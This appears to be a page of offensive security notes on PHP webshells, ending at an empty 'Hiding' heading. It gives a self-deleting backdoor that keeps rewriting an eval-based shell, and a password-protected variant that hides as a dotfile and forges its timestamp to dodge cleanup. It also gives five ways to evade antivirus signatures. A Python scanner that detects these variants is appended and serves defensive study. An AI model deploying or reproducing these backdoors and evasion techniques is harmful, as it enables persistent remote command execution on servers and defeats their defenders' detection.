Webshell

PHP Backdoor

Here is a PHP backdoor that is extremely hard to delete:
<?php
// Let the script keep executing even if the client disconnects
ignore_user_abort(true);
// Disable the script execution time limit
set_time_limit(0);
// Delete this file itself
unlink(__FILE__);

$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';

// Keep writing the PHP one-liner backdoor into the file
while (1) {
file_put_contents($file, $code);
usleep(5000);
}
?>
It deletes itself by calling unlink(__FILE__) and then keeps writing the webshell code into shell.php. An improved version of this backdoor adds a password in case someone else finds and uses it:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);

// Let the webshell be a hidden file
$file = '/var/www/dvwa/.config.php';
// password="super_secret_password"
$code = '<?php if(md5($_POST["pass"])=="a444f0a46019465ed8eb7f42548e6a0f"){@system($_POST[a]);}?>';
while (1) {
file_put_contents($file, $code);
// Reset the modification timestamp so a cleanup script keyed on mtime skips the file
// (use the full path in $file; a bare ".config.php" only works if the cwd is the webroot)
system('touch -m -d "2022-04-25 12:14:32" ' . escapeshellarg($file));
usleep(5000);
}
?>

Antivirus Bypass

Suppose antivirus software matches <?assert($_REQUEST[;?> and <?eval($_REQUEST[;?>. If these two patterns are found, then the webshell is detected and deleted. Our objective is to achieve the same functionality without using these two patterns directly.

Idea 1: Define a constant

<?php define("a","$_REQUEST[cmd]");eval(a);?>

Idea 2: Define a function

<?php
function a($a)
{
return $a;
}
eval(a($_REQUEST)['cmd']);
?>

Idea 3: Define a class

<?php
class User
{
public $name='';
function __destruct()
{
eval("$this->name");
}
}
// The original listing had these two lines inside the class body, which is a syntax error
$user=new User;
$user->name=''.$_REQUEST['cmd'];

Idea 4: Parameter

<?php
$COOKIE=$_COOKIE;
foreach($COOKIE as $key=>$value)
{
if($key=='assert')
{
$key($_REQUEST['cmd']);
}
}

Idea 5: get_defined_functions()

<?php
$a=get_defined_functions();
// Index 841 is the position of the intended function in this PHP build's internal
// function table; the index differs between PHP versions and builds
$a['internal'][841]($_REQUEST['cmd']);
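From the detection side, the lesson of the five ideas is that literal string signatures are brittle: a rule that pairs any code-execution sink with attacker-controlled input catches every variant. The scanner below is an added example, not code from the page; its sample strings and signature names are constructed for this illustration.

```python
import re

# Constructed samples mirroring the five evasion ideas on this page plus one
# benign file; they exist only so the scanner can be run offline.
SAMPLES = {
    "idea1": '<?php define("a","$_REQUEST[cmd]");eval(a);?>',
    "idea2": "<?php function a($a){return $a;} eval(a($_REQUEST)['cmd']);",
    "idea3": '<?php class U{public $n="";function __destruct(){eval("$this->n");}}'
             "$u=new U;$u->n=''.$_REQUEST['cmd'];",
    "idea4": "<?php foreach($_COOKIE as $k=>$v){if($k=='assert'){$k($_REQUEST['cmd']);}}",
    "idea5": "<?php $a=get_defined_functions();$a['internal'][841]($_REQUEST['cmd']);",
    "benign": "<?php echo htmlspecialchars($_GET['name']); ?>",
}

# The two literal strings the hypothetical antivirus on this page matches on.
NAIVE_PATTERNS = ("<?assert($_REQUEST[", "<?eval($_REQUEST[")

# Behavioural signatures: code-execution sinks, each checked alongside input.
SINKS = {
    "eval_or_assert": re.compile(r"\b(eval|assert)\s*\("),
    "command_exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "variable_function": re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$_"),  # $key($_REQUEST...)
    "array_element_call": re.compile(r"\]\s*\(\s*\$_"),              # $a[...]($_REQUEST...)
    "function_table": re.compile(r"\bget_defined_functions\s*\("),
}
INPUT = re.compile(r"\$_(REQUEST|POST|GET|COOKIE|SERVER)\b")


def naive_match(source):
    """True if either literal signature from the page would fire."""
    return any(p in source for p in NAIVE_PATTERNS)


def scan(source):
    """Return the sorted names of sink signatures present in a PHP source string."""
    return sorted(name for name, rx in SINKS.items() if rx.search(source))


def is_webshell(source):
    """Flag a file when a superglobal is read and at least one execution sink is present."""
    return bool(INPUT.search(source)) and bool(scan(source))


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:7} naive={naive_match(src)!s:5} behavioural={is_webshell(src)!s:5} {scan(src)}")
```

Running it shows naive=False for all six samples and behavioural=True for the five webshell variants only; the pairing rule is deliberately coarse and will need allow-listing on real code bases that legitimately call exec-family functions.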

Hiding
